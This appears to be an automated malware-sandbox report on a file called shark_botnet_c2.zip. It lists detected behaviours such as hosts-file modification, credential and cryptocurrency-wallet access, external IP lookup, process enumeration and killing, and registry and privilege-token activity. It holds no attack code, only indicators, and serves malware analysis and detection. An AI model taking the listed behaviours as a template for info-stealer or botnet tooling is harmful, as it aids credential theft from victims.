Analysis Overview
Threat Level: Likely malicious
The file https://sharksecurity.vercel.app/shark_botnet_c2.zip was found to be: Likely malicious.
Malicious Activity Summary
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
A potential corporate email address has been identified in the URL: currency-file@1
Unsecured Credentials: Credentials In Files
A potential corporate email address has been identified in the URL: =@L
Clipboard Data
Executes dropped EXE
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Obfuscated Files or Information: Command Obfuscation
UPX packed file
Enumerates processes with tasklist
System Network Configuration Discovery: Wi-Fi Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Browser Information Discovery
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Modifies registry class
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Gathers system information
Views/modifies file attributes
Suspicious behavior: EnumeratesProcesses
Detects videocard installed
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-07 16:30
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-07 16:30
Reported
2024-11-07 16:36
Platform
win10v2004-20241007-en
Max time kernel
387s
Max time network
388s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Temp1_villburs-xray-pack.zip\sharkbotnetc2.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
A potential corporate email address has been identified in the URL: =@L
A potential corporate email address has been identified in the URL: currency-file@1
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI35202\rar.exe | N/A |
Loads dropped DLL
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133754707828275862" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\NodeSlot = "5" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Downloads" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
